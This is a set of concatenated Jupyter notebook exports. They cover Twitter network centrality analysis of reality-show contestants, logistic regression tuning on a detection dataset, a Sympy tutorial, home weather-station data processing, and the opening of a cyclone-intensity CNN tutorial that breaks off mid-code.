print('Standard deviation: ' + str(np.std(out_degrees)))
print('Median: ' + str(np.median(out_degrees)))
print('iqr: ' + str(np.quantile(out_degrees, 0.75) - np.quantile(out_degrees, 0.25)))
print('Min: ' + str(np.min(out_degrees)))
print('Max: ' + str(np.max(out_degrees)))
random_out_degrees = list(dict(random_digraph_erdos.out_degree(weight="weight")).values())
cdf = ECDF(out_degrees)
x = np.unique(out_degrees)
y = cdf(x)
cdf_random = ECDF(random_out_degrees)
x_random = np.unique(random_out_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='D',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='8',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('Out-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/OutDegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
cdf_out = ECDF(out_degrees)
x_out = np.unique(out_degrees)
y_out = cdf_out(x_out)
cdf_in = ECDF(in_degrees)
x_in = np.unique(in_degrees)
y_in = cdf_in(x_in)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x_out,1-y_out,marker='o',ms=8, linestyle='-', label = "Out-degree", color = "#61CAE2")
axes.loglog(x_in,1-y_in,marker='o',ms=10, linestyle='-', label="In-degree", color = "#91D2BE")
axes.legend()
axes.set_xlabel('In-Out-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
```
## Connectivity
```
nx.is_strongly_connected(graph),nx.is_weakly_connected(graph)
```
C'è una giant componenent?
```
components_strong = nx.strongly_connected_components(graph)
components_weak = nx.weakly_connected_components(graph)
component_list_strong = list(components_strong)
component_list_weak = list(components_weak)
```
Numero delle componenti connesse:
```
len(component_list_strong)
len(component_list_weak)
len_cc = [len(wcc) for wcc in component_list_weak]
counts = pd.Series(len_cc).value_counts().sort_index()
fig_gc = plt.figure(figsize=(8,4))
axes = fig_gc.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(counts.index,counts.values,marker='o',ms=8, linestyle='None', color = "#EA63BD")
axes.set_xlabel('Weakly connected component size',size=20)
axes.set_ylabel('Count', size = 20)
plt.savefig("Images/ConnectedComponents.png", dpi=1200, bbox_inches='tight')
plt.show()
```
## Small World
```
sorted_components = sorted(component_list_weak, key = lambda x : len(x), reverse=True)
giant_component = graph.subgraph(sorted_components[0]).to_undirected()
# nx.diameter(giant_component)
```
E' 12 il diametro
## Transitivity
```
# global_clustering_coeff = nx.transitivity(graph.to_undirected())
# print("Coefficiente di Clustering globale: {}".format(global_clustering_coeff))
```
Coefficiente di Clustering globale: 0.0016440739612106675
```
# avg_local_clustering_coeff = nx.average_clustering(graph.to_undirected())
# avg_local_clustering_coeff0 = nx.average_clustering(graph.to_undirected(), count_zeros=False)
# print('Coefficiente di clustering locale medio: {}'.format(avg_local_clustering_coeff))
# print('Coefficiente di clustering locale medio >0 : {}'.format(avg_local_clustering_coeff0))
```
Coefficiente di clustering locale medio: 0.18450772763547055
Coefficiente di clustering locale medio >0 : 0.5825613071721611
## Reciprocity
```
print('Reciprocità: {}'.format(nx.overall_reciprocity(graph)))
```
Very low reciprocity is typical of an information network.
# Centrality
```
p99_indeg = np.percentile(in_degrees,99.9)
influencers_id = [(str(k),v) for k,v in in_degrees_noitems.items() if v>=p99_indeg]
bearer_token = json.load(open('application_keys.json'))['twitter']['bearer_token']
twitter_api = twitter.Twitter(auth=twitter.OAuth2(bearer_token=bearer_token))
in_deg_cen = nx.in_degree_centrality(graph)
out_deg_cen = nx.out_degree_centrality(graph)
influencers_username_centrality = [(twitter_api.users.show(user_id=k)['screen_name'],v,\
in_deg_cen[int(k)],out_degrees_dict[int(k)], out_deg_cen[int(k)], dragsUtility.isaDrag(str(k))) for (k,v) in influencers_id]
influencers_table = pd.DataFrame(influencers_username_centrality,\
columns=['user','in_degree','in_degree_centrality','out_degree','out_degree_centrality','isaCompetitor'])
influencers_table.set_index('user',inplace=True)
influencers_table.sort_values(by='in_degree_centrality',inplace=True,ascending=False)
influencers_table
influencers_table.to_csv('toTable/influencers.csv')
```
Tra gli influencer non ci sono tutti i partecipanti
```
ranking_by_degree_centrality = influencers_table.loc[influencers_table['isaCompetitor'] == True]
ranking_by_degree_centrality
len(ranking_by_degree_centrality)
contestant_degree = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])),list(in_degrees_noitems.items())))
contestant_degree_centrality = [( dragsUtility.getInfoAboutQueenByID(str(k))["Name"] ,v,\
in_deg_cen[int(k)],out_degrees_dict[int(k)], out_deg_cen[int(k)]) for (k,v) in contestant_degree]
contestant_degree_table = pd.DataFrame(contestant_degree_centrality,\
columns=['contestant','in_degree','in_degree_centrality','out_degree','out_degree_centrality'])
contestant_degree_table.sort_values(by='in_degree_centrality',inplace=True,ascending=False)
contestant_degree_table
centrality_rankings = {}
centrality_rankings['in_degree_centrality'] = list(contestant_degree_table["contestant"])
```
**PageRank**
```
# pagerank = nx.pagerank(graph, alpha=0.9, weight="weight")
# pagerank2 = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])), pagerank.items()))
# contestant_pagerank = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in pagerank2]
# contestant_pagerank = list(sorted( contestant_pagerank,key=lambda x: x[1], reverse=True))
# centrality_rankings['pageRank'] = [ k for (k,v) in contestant_pagerank]
# centrality_rankings['pageRank']
```
**Betweenness Centrality**
```
# beetweeness = nx.betweenness_centrality(graph, weight="weight")
# beetweeness2 = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])), beetweeness.items()))
# contestant_beetweeness = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in beetweeness2]
# contestant_beetweeness = list(sorted( contestant_beetweeness,key=lambda x: x[1], reverse=True))
# centrality_rankings['betweenness_centrality'] = [ k for (k,v) in contestant_beetweeness]
# centrality_rankings['betweenness_centrality']
```
**Harmonic Centrality**
```
sources = list(filter(lambda x: dragsUtility.isaDrag(str(x)),list(graph.nodes)))
# harmonic = nx.harmonic_centrality(graph, nbunch=sources)
# harmonic2 = list(harmonic.items())
# contestant_harmonic = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in harmonic2]
# contestant_harmonic = list(sorted( contestant_harmonic, key=lambda x: x[1], reverse=True))
# centrality_rankings['harmonic_centrality'] = [ k for (k,v) in contestant_harmonic]
# centrality_rankings['harmonic_centrality']
# harmonic_df = pd.DataFrame(contestant_harmonic, columns=["contestant", "harmonic_centrality"])
# harmonic_df.to_csv("harmonic_final.csv", index=False)
# import json
# with open('Data/rankings.json', 'w') as f:
# json.dump(centrality_rankings, f, indent=1)
centrality_table = pd.read_json('Data/rankings.json')
centrality_table["real_rank"] = dragsUtility.getRealRanking()
centrality_table = centrality_table[['real_rank', 'in_degree_centrality', 'pageRank', 'betweenness_centrality', 'harmonic_centrality']]
centrality_table
centrality_table = pd.read_json('Data/rankings.json')
centrality_table["real_rank"] = dragsUtility.getRealRanking()
centrality_table.to_csv("toTable/rankings.csv")
```
## Distanze delle classifiche
```
def get_distances(rank, real_rank):
tau, p_value = stats.kendalltau(rank, real_rank)
return {"kendall_tau": tau, "hamming": 1 - (distance.hamming(rank, real_rank))}
distance_json = {}
real_rank = dragsUtility.getRealRanking()
distance_json["in_degree_centrality"] = get_distances(list(centrality_table["in_degree_centrality"]), real_rank)
distance_json["pageRank"] = get_distances(list(centrality_table["pageRank"]), real_rank)
distance_json["betweenness_centrality"] = get_distances(list(centrality_table["betweenness_centrality"]), real_rank)
distance_json["harmonic_centrality"] = get_distances(list(centrality_table["harmonic_centrality"]), real_rank)
distance_json["DB"] = get_distances(dragsUtility.getDBRanking(), real_rank)
distance_json["age"] = get_distances(dragsUtility.getAgeRankig(), real_rank)
distance_json["real"] = get_distances(real_rank, real_rank)
distance_json
distance_table = pd.DataFrame.from_dict(distance_json, orient='index')
distance_table
distance_table.to_csv("toTable/distance.csv")
```
## Jaccard Similarity
```
def structural_equivalence_jaccard(graph, node1, node2):
neighbourn1, neighbourn2 = set(graph[node1].keys()),set(graph[node2].keys())
union = len(neighbourn1.union(neighbourn2))
inter = len(neighbourn1.intersection(neighbourn2))
return (inter/union) if (union > 0) else 0
sources = list(filter(lambda x: dragsUtility.isaDrag(str(x)),list(graph.nodes)))
similarity = [ tuple( ([dragsUtility.getInfoAboutQueenByID(str(node1))["Name"]] + [ structural_equivalence_jaccard(graph.to_undirected(), node1, node2) for node2 in sources ] )) \
for node1 in sources]
sources_names = [ dragsUtility.getInfoAboutQueenByID(str(drag))["Name"] for drag in sources]
data = pd.DataFrame(similarity, columns= ["contestant"] + sources_names)
data = data.set_index("contestant")
fig, ax = plt.subplots(figsize=(9,8))
ax = sns.heatmap(data, center = 0.45)
plt.savefig("Images/StructuralSimilarity.png", dpi=1200, bbox_inches='tight')
plt.show()
```
| github_jupyter |
Varying the values assigned to max_iter for experimentation.
```
#Import the libraries
import pandas as pd
import numpy as np
from tqdm import tqdm
from sklearn import linear_model, metrics, preprocessing, model_selection
from sklearn.preprocessing import StandardScaler
import xgboost as xgb
#Load the data
modeling_dataset = pd.read_csv('/content/drive/MyDrive/prediction/frac_cleaned_fod_data.csv', low_memory = False)
#All columns - except 'HasDetections', 'kfold', and 'MachineIdentifier'
train_features = [tf for tf in modeling_dataset.columns if tf not in ('HasDetections', 'kfold', 'MachineIdentifier')]
#The features selected based on the feature selection method earlier employed
train_features_after_selection = ['AVProductStatesIdentifier', 'Processor','AvSigVersion', 'Census_TotalPhysicalRAM', 'Census_InternalPrimaryDiagonalDisplaySizeInInches',
'Census_IsVirtualDevice', 'Census_PrimaryDiskTotalCapacity', 'Wdft_IsGamer', 'Census_IsAlwaysOnAlwaysConnectedCapable', 'EngineVersion',
'Census_ProcessorCoreCount', 'Census_OSEdition', 'Census_OSInstallTypeName', 'Census_OSSkuName', 'AppVersion', 'OsBuildLab', 'OsSuite',
'Firewall', 'IsProtected', 'Census_IsTouchEnabled', 'Census_ActivationChannel', 'LocaleEnglishNameIdentifier','Census_SystemVolumeTotalCapacity',
'Census_InternalPrimaryDisplayResolutionHorizontal','Census_HasOpticalDiskDrive', 'OsBuild', 'Census_InternalPrimaryDisplayResolutionVertical',
'CountryIdentifier', 'Census_MDC2FormFactor', 'GeoNameIdentifier', 'Census_PowerPlatformRoleName', 'Census_OSWUAutoUpdateOptionsName', 'SkuEdition',
'Census_OSVersion', 'Census_GenuineStateName', 'Census_OSBuildRevision', 'Platform', 'Census_ChassisTypeName', 'Census_FlightRing',
'Census_PrimaryDiskTypeName', 'Census_OSBranch', 'Census_IsSecureBootEnabled', 'OsPlatformSubRelease']
#Define the categorical features of the data
categorical_features = ['ProductName',
'EngineVersion',
'AppVersion',
'AvSigVersion',
'Platform',
'Processor',
'OsVer',
'OsPlatformSubRelease',
'OsBuildLab',
'SkuEdition',
'Census_MDC2FormFactor',
'Census_DeviceFamily',
'Census_PrimaryDiskTypeName',
'Census_ChassisTypeName',
'Census_PowerPlatformRoleName',
'Census_OSVersion',
'Census_OSArchitecture',
'Census_OSBranch',
'Census_OSEdition',
'Census_OSSkuName',
'Census_OSInstallTypeName',
'Census_OSWUAutoUpdateOptionsName',
'Census_GenuineStateName',
'Census_ActivationChannel',
'Census_FlightRing']
#Function for Logistic Regression Classification - max_iter = 100
def opt_run_lr100(fold, _iter):
#Get training and validation data using folds
cleaned_fold_datasets_train = modeling_dataset[modeling_dataset.kfold != fold].reset_index(drop=True)
cleaned_fold_datasets_valid = modeling_dataset[modeling_dataset.kfold == fold].reset_index(drop=True)
#Initialize OneHotEncoder from scikit-learn, and fit it on training and validation features
ohe = preprocessing.OneHotEncoder()
full_data = pd.concat(
[cleaned_fold_datasets_train[train_features_after_selection],cleaned_fold_datasets_valid[train_features_after_selection]],
axis = 0
)
ohe.fit(full_data[train_features_after_selection])
#transform the training and validation data
x_train = ohe.transform(cleaned_fold_datasets_train[train_features_after_selection])
x_valid = ohe.transform(cleaned_fold_datasets_valid[train_features_after_selection])
#Initialize the Logistic Regression Model
lr_model = linear_model.LogisticRegression(
penalty= 'l2',
C = 49.71967742639108,
solver= 'lbfgs',
max_iter= _iter,
n_jobs=-1
)
#Fit model on training data
lr_model.fit(x_train, cleaned_fold_datasets_train.HasDetections.values)
#Predict on the validation data using the probability for the AUC
valid_preds = lr_model.predict_proba(x_valid)[:, 1]
#For precision and Recall
valid_preds_pc = lr_model.predict(x_valid)
#Get the ROC AUC score
auc = metrics.roc_auc_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds)
#Get the precision score
pre = metrics.precision_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds_pc, average='binary')
#Get the Recall score
rc = metrics.recall_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds_pc, average='binary')
return auc, pre, rc
lr100 = []
for _iter in range(50,350,50):
for fold in tqdm(range(10)):
lr100.append(opt_run_lr100(fold, _iter))
lr100
len(lr100)
#Plotting graph: Accuracy vs. Number of Iteration for the Logistic Regression Model
#The different number of max_iter used
iter = [50,100,150,200,250,300]
#Initialize the list for the AUC
lr100_auc = []
#When iter = 50
iter50 = lr100[0:10]
lr100_50 = []
for i in iter50:
lr100_50.append(i[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_50)/len(lr100_50))
#When iter = 100
iter100 = lr100[10:20]
lr100_100 = []
for j in iter100:
lr100_100.append(j[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_100)/len(lr100_100))
#When iter = 150
iter150 = lr100[20:30]
lr100_150 = []
for k in iter150:
lr100_150.append(k[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_150)/len(lr100_150))
#When iter = 200
iter200 = lr100[30:40]
lr100_200 = []
for l in iter200:
lr100_200.append(l[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_200)/len(lr100_200))
#When iter = 250
iter250 = lr100[40:50]
lr100_250 = []
for m in iter250:
lr100_250.append(m[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_250)/len(lr100_250))
#When iter = 300
iter300 = lr100[50:60]
lr100_300 = []
for n in iter300:
lr100_300.append(n[0])
#Append this to the AUC list
lr100_auc.append(sum(lr100_300)/len(lr100_300))
#Let's print the AUC
print(lr100_auc)
import matplotlib.pyplot as plt
plt.plot(iter,lr100_auc)
plt.title('Accuracy versus Number of Iterations in Logistic Regression')
plt.xlabel('Number of Iterations')
plt.ylabel('Accuracy')
plt.show()
```
Bar chart to comapre the performances of Logistics Regression and XGBoost in each of the stages of Model Building.
```
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
labels = ['Logistics Regression', 'XGBoost']
basic_model = [0.67121, 0.62663]
target_encoding = [0.67159, 0.61663]
best_features = [0.67233, 0.66524]
lowvariance_removed = [0.63243, 0.66254]
bestparams_bestfeatures = [0.67241, 0.65837]
x = np.arange(len(labels)) # the label locations
width = 0.1 # the width of the bars
plt.figure(figsize=(15,8))
plt.bar(x-0.1, basic_model, width, label = 'Basic Model')
plt.bar(x, target_encoding, width, label = 'Target Encoding')
plt.bar(x+0.1, best_features, width, label = 'Best Selected Features')
plt.bar(x+0.2, lowvariance_removed, width, label = 'Low Variance Features Removed')
plt.bar(x+0.3, bestparams_bestfeatures, width, label = 'Best Params and Best Selected Features')
plt.xticks(x, labels)
plt.xlabel("Models")
plt.ylabel("Accuracy Scores")
plt.title("Accuracy Scores for each stage in the model building")
plt.legend()
plt.show()
```
| github_jupyter |
# Symbolic mathematics with Sympy
[Sympy](http://www.sympy.org/en/index.html) is described as a:
> "... Python library for symbolic mathematics."
This means it can be used to:
- Manipulate symbolic expressions;
- Solve symbolic equations;
- Carry out symbolic Calculus;
- Plot symbolic function.
It has other capabilities that we will not go in to in this handbook. But you can read more about it here: http://www.sympy.org/en/index.html
## Manipulating symbolic expressions
Before we can start using the library to manipulate expressions, we need to import it.
```
import sympy as sym
```
The above imports the library and gives us access to it's commands using the shortand `sym` which is conventially used.
If we wanted to get Python to check that $x - x = 0$ we would get an error if we did not tell Python what $x$ was.
This is where Sympy comes in, we can tell Python to create $x$ as a symbolic variable:
```
x = sym.symbols('x')
```
Now we can calculate $x - x$:
```
x - x
```
We can create and manipulate expressions in Sympy. Let us for example verify:
$$(a + b) ^ 2 = a ^ 2 + 2ab + b ^2$$
First, we create the symbolic variables $a, b$:
```
a, b = sym.symbols('a, b')
```
Now let's create our expression:
```
expr = (a + b) ** 2
expr
```
**Note** we can get Sympy to use LaTeX so that the output looks nice in a notebook:
```
sym.init_printing()
expr
```
Let us expand our expression:
```
expr.expand()
```
Note that we can also get Sympy to produce the LaTeX code for future use:
```
sym.latex(expr.expand())
```
---
**EXERCISE** Use Sympy to verify the following expressions:
- $(a - b) ^ 2 = a ^ 2 - 2 a b + b^2$
- $a ^ 2 - b ^ 2 = (a - b) (a + b)$ (instead of using `expand`, try `factor`)
## Solving symbolic equations
We can use Sympy to solve symbolic expression. For example let's find the solution in $x$ of the quadratic equation:
$$a x ^ 2 + b x + c = 0$$
```
# We only really need to define `c` but doing them all again.
a, b, c, x = sym.symbols('a, b, c, x')
```
The Sympy command for solving equations is `solveset`. The first argument is an expression for which the root will be found. The second argument is the value that we are solving for.
```
sym.solveset(a * x ** 2 + b * x + c, x)
```
---
**EXERCISE** Use Sympy to find the solutions to the generic cubic equation:
$$a x ^ 3 + b x ^ 2 + c x + d = 0$$
---
It is possible to pass more arguments to `solveset` for example to constrain the solution space. Let us see what the solution of the following is in $\mathbb{R}$:
$$x^2=-1$$
```
sym.solveset(x ** 2 + 1, x, domain=sym.S.Reals)
```
---
**EXERCISE** Use Sympy to find the solutions to the following equations:
- $x ^ 2 == 2$ in $\mathbb{N}$;
- $x ^ 3 + 2 x = 0$ in $\mathbb{R}$.
---
## Symbolic calculus
We can use Sympy to compute limits. Let us calculate:
$$\lim_{x\to 0^+}\frac{1}{x}$$
```
sym.limit(1/x, x, 0, dir="+")
```
---
**EXERCISE** Compute the following limits:
1. $\lim_{x\to 0^-}\frac{1}{x}$
2. $\lim_{x\to 0}\frac{1}{x^2}$
---
We can use also Sympy to differentiate and integrate. Let us experiment with differentiating the following expression:
$$x ^ 2 - \cos(x)$$
```
sym.diff(x ** 2 - sym.cos(x), x)
```
Similarly we can integrate:
```
sym.integrate(x ** 2 - sym.cos(x), x)
```
We can also carry out definite integrals:
```
sym.integrate(x ** 2 - sym.cos(x), (x, 0, 5))
```
---
**EXERCISE** Use Sympy to calculate the following:
1. $\frac{d\sin(x ^2)}{dx}$
2. $\frac{d(x ^2 + xy - \ln(y))}{dy}$
3. $\int e^x \cos(x)\;dx$
4. $\int_0^5 e^{2x}\;dx$
## Plotting with Sympy
Finally Sympy can be used to plot functions. Note that this makes use of another Python library called [matplotlib](http://matplotlib.org/). Whilst Sympy allows us to not directly need to make use of matplotlib it could be worth learning to use as it's a very powerful and versatile library.
Before plotting in Jupyter we need to run a command to tell it to display the plots directly in the notebook:
```
%matplotlib inline
```
Let us plot $x^2$:
```
expr = x ** 2
p = sym.plot(expr);
```
We can directly save that plot to a file if we wish to:
```
p.save("x_squared.pdf");
```
---
**EXERCISE** Plot the following functions:
- $y=x + cos(x)$
- $y=x ^ 2 - e^x$ (you might find `ylim` helpful as an argument)
Experiment with saving your plots to a file.
---
## Summary
This section has discussed using Sympy to:
- Manipulate symbolic expressions;
- Calculate limits, derivates and integrals;
- Plot a symbolic expression.
This just touches the surface of what Sympy can do.
Let us move on to using [Numpy](02 - Linear algebra with Numpy.ipynb) to do Linear Algebra.
| github_jupyter |
# Climate Data from Home System
```
from erddapy import ERDDAP
import pandas as pd
import datetime
# for secondary/derived parameters
from metpy.units import units
import metpy.calc as mpcalc
server_url = 'http://raspberrypi.local:8080/erddap'
#server_url = 'http://192.168.2.3:8080/erddap'
e = ERDDAP(server=server_url)
df = pd.read_csv(e.get_search_url(response='csv', search_for='MoonFlower'))
print(df['Dataset ID'].values)
dataset_id='tempest_moonflower_wx'
try:
d = ERDDAP(server=server_url,
protocol='tabledap',
response='csv'
)
d.dataset_id=dataset_id
except HTTPError:
print('Failed to generate url {}'.format(dataset_id))
try:
df_m = d.to_pandas(
index_col='time (UTC)',
parse_dates=True,
skiprows=(1,) # units information can be dropped.
)
df_m.sort_index(inplace=True)
df_m.columns = [x[1].split()[0] for x in enumerate(df_m.columns)]
except:
print(f"something failed in data download {dataset_id}")
pass
df_m.drop(columns=['device_id', 'bucket_step_minutes', 'wind_lull','wind_interval'],inplace=True)
#stats are all utc driven - but we really want local daily values
df_m=df_m.tz_convert('US/Pacific')
# calculations of various parameters... metpy?
# HDD/CDD, dewpointTemp
df_m['dewpointTemp']=mpcalc.dewpoint_from_relative_humidity(df_m.temperature.values * units.degC,
df_m.humidity.values * units.percent)
#wetbulb from metpy had issues
df_m['SLP']=df_m.pressure.values * (1+((1013.25/df_m.pressure.values)**((287.05*0.0065)/9.80665)) * (0.0065*87.3)/288.15)**(9.80665/(287.05*0.0065))
df_daily_max = df_m.resample('D').max()
df_daily_min = df_m.resample('D').min()
df_daily_ave = df_m.resample('D').mean()
df_daily_total = df_m.resample('1T').mean().resample('D').sum()
df_m.sample()
use_current_month = True
if use_current_month:
current_month = datetime.datetime.now().month
else:
current_month = 7
current_month_grid_data=pd.DataFrame()
current_month_grid_data = df_daily_max[df_daily_max.index.month==current_month].temperature
current_month_grid_data = pd.concat([current_month_grid_data,
df_daily_min[df_daily_min.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].dewpointTemp.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].SLP.round(1),
df_daily_total[df_daily_total.index.month==current_month].solar_radiation.round(0),
df_daily_max[df_daily_max.index.month==current_month].uv.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].wind_avg.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].wind_dir.astype(int),
df_daily_max[df_daily_max.index.month==current_month].wind_gust.round(1)
],axis=1)
current_month_grid_data.columns=('max_temperature','min_temperature','mean_temperature','mean_dewpoint','mean SLP','total_solar_radiation','max_uv_index','average speed','average dir','max gust')
current_month_grid_data['station_id'] = 'tempest'
#this should go to erddap
current_month_grid_data.to_csv(f'Data/MoonflowerTempest_2020{str(current_month).zfill(2)}.csv')
def highlight_max(s):
'''
highlight the maximum in a Series yellow.
'''
is_max = s == s.max()
return ['color: red' if v else '' for v in is_max]
def highlight_min(s):
'''
highlight the maximum in a Series yellow.
'''
is_min = s == s.min()
return ['color: blue' if v else '' for v in is_min]
current_month_grid_data.drop('station_id',axis=1).style.apply(highlight_max).apply(highlight_min).format("{:.2f}")
### need to manage daily records, monthly records, alltime records
```
## repeat for each sensor on property
choose month or use current (starting with data subsetting)
```
if use_current_month:
constraints = {
'time>=': datetime.datetime.now().strftime('%Y-%m-01T00:00:00Z'),
}
else:
constraints = {
'time>=': '2020-01-01T00:00:00Z',
'time<=': '2027-02-10T00:00:00Z',
}
alldatasets=['channel_1314759_thingspeak',
'channel_1027974_thingspeak',
'channel_1037066_thingspeak',
'channel_1047747_thingspeak',
'channel_843357_thingspeak',
'channel_rpi']
df_all = {}
for dataset_id in alldatasets:
try:
d = ERDDAP(server=server_url,
protocol='tabledap',
response='csv'
)
d.dataset_id=dataset_id
d.constraints=constraints
except HTTPError:
print('Failed to generate url {}'.format(dataset_id))
try:
df_m = d.to_pandas(
index_col='time (UTC)',
parse_dates=True,
skiprows=(1,) # units information can be dropped.
)
df_m.sort_index(inplace=True)
df_m.columns = [x[1].split()[0] for x in enumerate(df_m.columns)]
except:
print(f"something failed in data download {dataset_id}")
pass
#stats are all utc driven - but we really want local daily values
df_m=df_m.tz_convert('US/Pacific')
df_all.update({dataset_id:df_m})
# calculations of various parameters... metpy?
# HDD/CDD, dewpointTemp
for k,v in enumerate(df_all):
print(df_all[v].keys())
if use_current_month:
current_month = datetime.datetime.now().month
else:
current_month = 7
for k,v in enumerate(df_all):
print(df_all[v].keys())
df_daily_max = df_all[v].resample('D').max()
df_daily_min = df_all[v].resample('D').min()
df_daily_ave = df_all[v].resample('D').mean()
if ('RH_Percent' in df_all[v].keys()) and ('temperature' in df_all[v].keys()) and (not 'Barotemperature' in df_all[v].keys()):
print(f"processing {v} :0")
current_month_grid_data=pd.DataFrame()
current_month_grid_data = df_daily_max[df_daily_max.index.month==current_month].temperature
current_month_grid_data = pd.concat([current_month_grid_data,
df_daily_min[df_daily_min.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].RH_Percent.round(1),
],axis=1)
current_month_grid_data.columns=('max_temperature','min_temperature','mean_temperature','mean_humidity')
current_month_grid_data['station_id'] = v
current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
elif (not 'RH_Percent' in df_all[v].keys()) and ('temperature' in df_all[v].keys()) and (not 'Barotemperature' in df_all[v].keys()):
print(f"processing {v} :1")
current_month_grid_data=pd.DataFrame()
current_month_grid_data = df_daily_max[df_daily_max.index.month==current_month].temperature
current_month_grid_data = pd.concat([current_month_grid_data,
df_daily_min[df_daily_min.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].temperature.round(1),
],axis=1)
current_month_grid_data.columns=('max_temperature','min_temperature','mean_temperature')
current_month_grid_data['station_id'] = v
#this should go to erddap
current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
elif ('RH_Percent' in df_all[v].keys()) and ('temperature' in df_all[v].keys()) and ('Barotemperature' in df_all[v].keys()):
print(f"processing {v} :2")
current_month_grid_data=pd.DataFrame()
current_month_grid_data = df_daily_max[df_daily_max.index.month==current_month].Barotemperature
current_month_grid_data = pd.concat([current_month_grid_data,
df_daily_min[df_daily_min.index.month==current_month].Barotemperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].Barotemperature.round(1),
],axis=1)
current_month_grid_data.columns=('max_temperature','min_temperature','mean_temperature')
current_month_grid_data['station_id'] = v
#this should go to erddap
current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
else:
print(f"passing {v} :3")
pass
print(f'{v}')
current_month_grid_data.drop('station_id',axis=1).style.apply(highlight_max).apply(highlight_min).format("{:.2f}")
```
| github_jupyter |
     
     
     
     
     
   
[Home Page](../Start_Here.ipynb)
[Previous Notebook](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
     
     
     
     
[1](The_Problem_Statement.ipynb)
[2](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
[3]
[4](Countering_Data_Imbalance.ipynb)
[5](Competition.ipynb)
     
     
     
     
[Next Notebook](Countering_Data_Imbalance.ipynb)
# Tropical Cyclone Intensity Estimation using a Deep Convolutional Neural Network - Part 2
**Contents of this notebook:**
- [Understand the Model Requirements](#Understand-the-Model-requirements)
- [Exploring Resizing Options](#Exploring-different-types-of-resizing-options)
- [Choosing a Random Patch](#Step-2-:-Choosing-a-Random-Patch-from-the-Image)
- [Annotating Our Dataset ](#Annotating-our-dataset)
- [Wrapping Things Up](#Wrapping-Things-Up-:)
- [Preparing the Dataset](#Preparing-the-Dataset)
- [Defining our Model](#Defining-our-Model)
- [Compiling and Training our Model](#Compiling-and-Training-our-Model)
- [Visualisations](#Visualisations)
**By the end of this Notebook you will:**
- Understand the Model Requirements.
- Annotation of Dataset.
- Train your Model.
## Understand the Model requirements
### We have seen the model to which our image will be fed
- The model described in the paper

We can see that the images need to be ( 232, 232, 3) in shape to be fed into our model.
So, we will do the following steps before feeding the image into our model.
- Step 1 : Resize Image from ( 1024, 1024 ,3) to ( 256 , 256 ,3 )
- Step 2 : Choose a random ( 232 , 232 , 3 ) patch from the ( 256 , 256 , 3 ) and feed into our model.
**Alternate Approach** : We can modify the model's input shape to be ( 256 x 256 x 3 ) and train it on the scaled images, but we take a ( 232 x 232 x 3 ) random patch so that our model does not expect the cyclone to be in the center and learn to understanding the mapping even with the cyclones in the sides of the images.
### Step 1 :
Let's now start with Step 1 and understand all the resizing methods available to do so.
```
import cv2
#Read the Image Using cv2.imread()
img = cv2.imread('images/image_shape.jpg',1)
#Changing the Color Spaces
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Print the Shape of the Image
img.shape
%matplotlib inline
import matplotlib.pyplot as plt
#Plot the image
plt.imshow(img)
```
## Exploring different types of resizing options
The Images can be resized in different ways. Some methods are as follows (as stated in OpenCV documentation) :
<h3>Scaling</h3>
<p>Scaling is just resizing of the image. OpenCV comes with a function <b>cv2.resize()</a></b> for this purpose. The size of the image can be specified manually, or you can specify the scaling factor. Different interpolation methods are used. Preferable interpolation methods are <b>cv2.INTER_AREA</b> for shrinking and <b>cv2.INTER_CUBIC</b> (slow) & <b>cv2.INTER_LINEAR</b> for zooming. By default, interpolation method used is <b>cv2.INTER_LINEAR</b> for all resizing purposes.
* cv2.INTER_AREA ( Preferable for Shrinking )
* cv2.INTER_CUBIC ( Preferable for Zooming but slow )
* cv2.INTER_LINEAR ( Preferable for Zooming and the default option )
### Step 2 : Choosing a Random Patch from the Image
We will use the `np.random.randint()` function from the Numpy toolbox to generate random numbers. The parameters of this function are the upper limits and size of the Output array as mentioned in the [Numpy Documentation](https://numpy.org/doc/stable/reference/random/generated/numpy.random.randint.html)
## Wrapping things up
```
#Import numpy to Generate Random Numbers
